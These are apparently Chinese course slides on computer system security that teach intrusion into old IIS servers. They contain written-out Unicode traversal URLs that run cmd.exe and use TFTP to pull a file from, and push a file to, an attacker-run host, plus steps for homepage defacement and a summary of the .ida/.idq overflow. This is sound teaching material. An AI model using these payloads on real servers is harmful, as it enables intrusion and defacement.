计算机系统安全（第2版）课件 22实例-基于服务器软件漏洞的入侵.pptVIP

进入c:\inetpub\wwwroot 使用dir+c:\inetpub\wwwroot查找首页 * 本地打开TFTP服务器 运行tftpd32.exe，准备文件传输（也可用hfs、slimftp） * TFTP服务器tftpd32 服务器配置界面 * TFTP服务器tftpd32 TFTP客户端 tftp [-i] [Host] [{get | put}] [Source] [Destination] * 下载文件 28/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp++GET+1.bat+c:\1.bat * 上传文件 28/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp++put+c:\inetpub\wwwroot\iisstart.asp+3.asp * 更改主页 若wwwroot目录可写入，则可更改主页 * IIS的.ida.idq漏洞 IIS的Index server可加快web搜索能力，提供对管理员脚本和Internet数据的查询，默认支持管理脚本.ida和查询脚本.idq，都是使用idq.dll进行解析 idq.dll 扩展程序没有对提交的参数进行边界检查，入侵者可通过溢出获得管理员权限 受影响版本WIN2000+IIS5.0、WINNT+IIS4.0